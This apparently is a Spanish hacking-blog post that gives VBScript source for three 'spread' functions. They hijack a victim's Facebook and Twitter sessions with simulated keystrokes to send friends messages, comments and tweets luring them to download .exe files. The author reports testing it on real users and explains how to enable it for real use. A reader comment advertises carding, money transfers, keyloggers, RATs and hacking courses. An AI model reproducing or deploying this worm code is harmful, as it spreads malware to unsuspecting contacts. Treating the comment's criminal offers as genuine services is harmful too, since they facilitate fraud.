miércoles, 28 de mayo de 2014

[VBS] [SOURCE] Facebook y Twitter Spread

8:34 a.m.


3 funciones de Spread que permitirán reproducir una infección vírica usando Facebook (2 métodos) y Twitter (1 método)

El funcionamiento es muy simple. Primero de todo se tienen que dar unas circunstancias para que el "spread" sea efectivo, he realizado pruebas con usuarios reales y me he quedado asombrado con la efectividad de éste "spread". El código se aprovecha de los atajos de teclado que hay en las web's de FB y TW. Eso significa que si cambian los atajos, la función dejará de funcionar... Empecemos con la primera:

Spread usando mensajes personales de Facebook

Primero de todo, os contaré las pulsaciones que ejecuta el script para que las podáis testear en vuestro propio FB, es muy fácil:

1. Entra en www.facebook.com
2. Inicia sesión en tu perfil
3. Pulsa la combinación de teclas: ALT+M
4. Pulsa una tecla (la letra C por ejemplo)
5. Pulsa Enter y Tabulador
6. Escribe un texto y pulsa Enter

Si lo has hecho bien, verás que has enviado un mensaje a un contacto de tu lista de amigos. Pues bien, el script automatiza todas esas acciones en el PC de la víctima:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call fb_msg_spread("holaa, te he etiquetado en esta foto http://www.servidor.com/mifoto.exe")
  3. Function FB_MSG_Spread(X)
  4. Randomize
  5. C = Chr(Int(rnd*26)+97)
  6. WS.run "http://www.facebook.com"
  7. WScript.Sleep 5000
  8. WS.SendKeys "%m"
  9. WScript.Sleep 500
  10. For i = 1 to Int(rnd*5)+2
  11. WS.SendKeys C
  12. WScript.Sleep 500
  13. WS.SendKeys "{ENTER}"
  14. Next
  15. WScript.Sleep 500
  16. WS.SendKeys "{TAB}"
  17. WScript.Sleep 500
  18. WS.SendKeys X
  19. WScript.Sleep 500
  20. 'WS.SendKeys "{ENTER}"
  21. End Function

Copiad ese código TAL CUAL en un fichero de texto y lo guardáis como VBS. La última linea esta comentada, por lo que no os preocupéis, no se va a mandar ningún mensaje a ningún contacto vuestro.

Ahora ejecutad el fichero y mirar como se reproduce la secuencia de comandos. El script calcula una letra al azar y la utiliza para enviar el mensaje a varios contactos simultaneamente. Para utilizar éste código de forma real, quita el comentario de la última línea y ya tendrás un estupendo spread por Facebook.



Spread usando noticias del muro de Facebook

Éste metodo es parecido al anterior, pero utiliza las teclas J y C para buscar una noticia al azar y enviar el comentario:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call fb_txt_spread("ei, creo que te han etiquetado sin tu permiso! http://www.servidor.com/lafoto.exe")
  3. Function FB_TXT_Spread(X)
  4. Randomize
  5. WS.run "http://www.facebook.com"
  6. WScript.Sleep 5000
  7. For i = 1 to Int(rnd*5)+1
  8. WS.SendKeys "j"
  9. WScript.Sleep 800
  10. Next
  11. WS.SendKeys "c"
  12. WScript.Sleep 800
  13. WS.SendKeys X
  14. WScript.Sleep 500
  15. 'WS.SendKeys "{ENTER}"
  16. WScript.Sleep 500
  17. WS.SendKeys "{TAB}"
  18. WScript.Sleep 500
  19. WS.SendKeys "{TAB}"
  20. WScript.Sleep 500
  21. WS.SendKeys "j"
  22. End Function

De igual modo que en el ejemplo anterior, podéis ejecutar éste script ya que la tecla ENTER está comentada y no hay riesgo. Para utilizar el script en un entorno real, quitad el comentario.



Spread usando un tweet en Twitter

Lo mismo que los anteriores casos, utilizando la tecla M para mandar un tweet:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call tw_txt_spread("Acabo de publicar un album de fotos http://www.servidor.com/photo_album.exe")
  3. Function TW_TXT_Spread(X)
  4. Randomize
  5. WS.run "http://www.twitter.com"
  6. WScript.Sleep 6000
  7. WS.SendKeys "n"
  8. WScript.Sleep 800
  9. WS.SendKeys X
  10. WScript.Sleep 500
  11. WS.SendKeys "{TAB}"
  12. WScript.Sleep 500
  13. 'WS.SendKeys "{ENTER}"
  14. End Function

Podéis probar el código, ya que la tecla ENTER también está comentada.
Click Here - Aqui!

1 comentarios :

  1. Hello all
    am looking few years that some guys comes into the market
    they called themselves hacker, carder or spammer they rip the
    peoples with different ways and it’s a badly impact to real hacker
    now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
    Anyone want to make deal with me any type am available but first
    I‘ll show the proof that am real then make a deal like

    Available Services

    ..Wire Bank Transfer all over the world

    ..Western Union Transfer all over the world

    ..Credit Cards (USA, UK, AUS, CAN, NZ)

    ..School Grade upgrade / remove Records

    ..Spamming Tool

    ..keyloggers / rats

    ..Social Media recovery

    .. Teaching Hacking / spamming / carding (1/2 hours course)

    discount for re-seller

    Contact: 24/7

    fixitrogers@gmail.com

    ResponderBorrar

 

© 2013 Hack Google Youtube Facebook .